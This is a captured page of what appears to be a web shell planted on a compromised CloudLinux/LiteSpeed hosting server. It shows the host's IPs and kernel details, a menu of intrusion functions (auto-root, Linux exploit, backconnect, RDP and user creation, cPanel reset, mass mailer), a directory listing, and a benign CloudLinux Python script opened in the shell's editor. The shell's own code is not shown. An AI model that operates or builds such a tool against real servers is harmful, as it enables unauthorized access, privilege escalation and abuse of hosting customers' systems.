Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.208
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
opt /
cloudlinux /
venv /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
Activate.ps1
8.82
KB
-rw-r--r--
activate
1.65
KB
-rw-r--r--
activate.csh
915
B
-rw-r--r--
activate.fish
2.14
KB
-rw-r--r--
alembic
202
B
-rwxr-xr-x
cagefs_enter_site.py
1.83
KB
-rwxr-xr-x
cagefsctl_user.py
12.89
KB
-rwxr-xr-x
chardetect
210
B
-rwxr-xr-x
cl_sysctl
4.51
KB
-rwxr-xr-x
clcpapi
3.64
KB
-rwxr-xr-x
coverage
204
B
-rwxr-xr-x
coverage-3.11
204
B
-rwxr-xr-x
coverage3
204
B
-rwxr-xr-x
cpanel-dbmapping
3.83
KB
-rwxr-xr-x
crontab-user-wrapper.py
2.46
KB
-rwxr-xr-x
da_suid_caller.py
686
B
-rw-r--r--
detect-requirements
211
B
-rwxr-xr-x
dodgy
197
B
-rwxr-xr-x
epylint
208
B
-rwxr-xr-x
f2py
205
B
-rwxr-xr-x
f2py3
205
B
-rwxr-xr-x
f2py3.11
205
B
-rwxr-xr-x
flake8
203
B
-rwxr-xr-x
futurize
204
B
-rwxr-xr-x
get_gprof
1.84
KB
-rwxr-xr-x
get_objgraph
1.63
KB
-rwxr-xr-x
isort
198
B
-rwxr-xr-x
isort-identify-imports
232
B
-rwxr-xr-x
jsonschema
202
B
-rwxr-xr-x
lvestats_config_reader.py
1.12
KB
-rw-r--r--
mako-render
202
B
-rwxr-xr-x
normalizer
233
B
-rwxr-xr-x
pasteurize
206
B
-rwxr-xr-x
pip
237
B
-rwxr-xr-x
pip3
237
B
-rwxr-xr-x
pip3.11
237
B
-rwxr-xr-x
plesk_suid_caller.py
905
B
-rw-r--r--
prospector
202
B
-rwxr-xr-x
py.test
210
B
-rwxr-xr-x
pycodestyle
201
B
-rwxr-xr-x
pydocstyle
202
B
-rwxr-xr-x
pyflakes
200
B
-rwxr-xr-x
pylint
206
B
-rwxr-xr-x
pylint-config
222
B
-rwxr-xr-x
pyreverse
212
B
-rwxr-xr-x
pysemver
198
B
-rwxr-xr-x
pytest
210
B
-rwxr-xr-x
python
15.59
KB
-rwxr-xr-x
python3
15.59
KB
-rwxr-xr-x
python3.11
15.59
KB
-rwxr-xr-x
raven
208
B
-rwxr-xr-x
symilar
208
B
-rwxr-xr-x
tap
196
B
-rwxr-xr-x
tappy
196
B
-rwxr-xr-x
undill
603
B
-rwxr-xr-x
virtualenv
227
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : clcpapi
#!/opt/cloudlinux/venv/bin/python3 -bb # -*- coding: utf-8 -*- # Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2018 All Rights Reserved # # Licensed under CLOUD LINUX LICENSE AGREEMENT # http://cloudlinux.com/docs/LICENSE.TXT """ CloudLinux control panel API command line interface """ import argparse from clcommon import cpapi from clcommon.cloutput import prepare_data_json, prepare_attention_json from clcommon.cpapi import cpapiexceptions def cpapi_parser(): parser = argparse.ArgumentParser(description="%(prog)s - CloudLinux control panel API command line interface") parser.add_argument('-j', '--json', action='store_true', default=False, help='Output in json format') subparsers = parser.add_subparsers(dest='command') docroot_parser = subparsers.add_parser('docroot') docroot_parser.add_argument('domain', help='Return document root for domain') userdomains_parser = subparsers.add_parser('userdomains') userdomains_parser.add_argument('userdomains', help='Return domain and document root pairs for control panel user') dblogin_cplogin_pairs_parser = subparsers.add_parser("dblogin_cplogin_pairs") dblogin_cplogin_pairs_parser.add_argument("--cplogin_lst", nargs="*", help="Return mapping for this system users") dblogin_cplogin_pairs_parser.add_argument("--with_system_users", action="store_true", default=False, help="Show system users in output") reseller_users = subparsers.add_parser("reseller-users", help="Show reseller users") reseller_users.add_argument( 'resellername', type=str, nargs='?', help='Reseller name') return parser def flat_plain(data, sep=' '): return '\n'.join([sep.join(tuple_) for tuple_ in data]) def main(): parser = cpapi_parser() namespace = parser.parse_args() output_ = None exit_code = 0 try: if namespace.command == 'docroot': domain, user = cpapi.docroot(namespace.domain) if namespace.json: output_ = prepare_data_json({'domain': domain, 'user': user}) else: output_ = domain + ' ' + user elif namespace.command == 'userdomains': domain_docroot_pairs = cpapi.userdomains(namespace.userdomains) if namespace.json: data = [{'domain': domain_docroot[0], 'docroot': domain_docroot[1]} for domain_docroot in domain_docroot_pairs] output_ = prepare_data_json(data) else: output_ = flat_plain(domain_docroot_pairs) elif namespace.command == 'dblogin_cplogin_pairs': db_mapping = cpapi.dblogin_cplogin_pairs(namespace.cplogin_lst, namespace.with_system_users) if namespace.json: output_ = prepare_data_json(db_mapping) else: output_ = flat_plain(db_mapping) elif namespace.command == 'reseller-users': users = cpapi.reseller_users(namespace.resellername) if namespace.json: output_ = prepare_data_json(users) else: output_ = '\n'.join(users) except cpapiexceptions.CPAPIException as e_: if namespace.json: output_ = prepare_attention_json(str(e_)) else: exit_code = 1 output_ = 'ERROR: ' + str(e_) return output_, exit_code if __name__ == '__main__': import sys output_, exit_code = main() if output_: print(output_) if exit_code: sys.exit(exit_code)
Close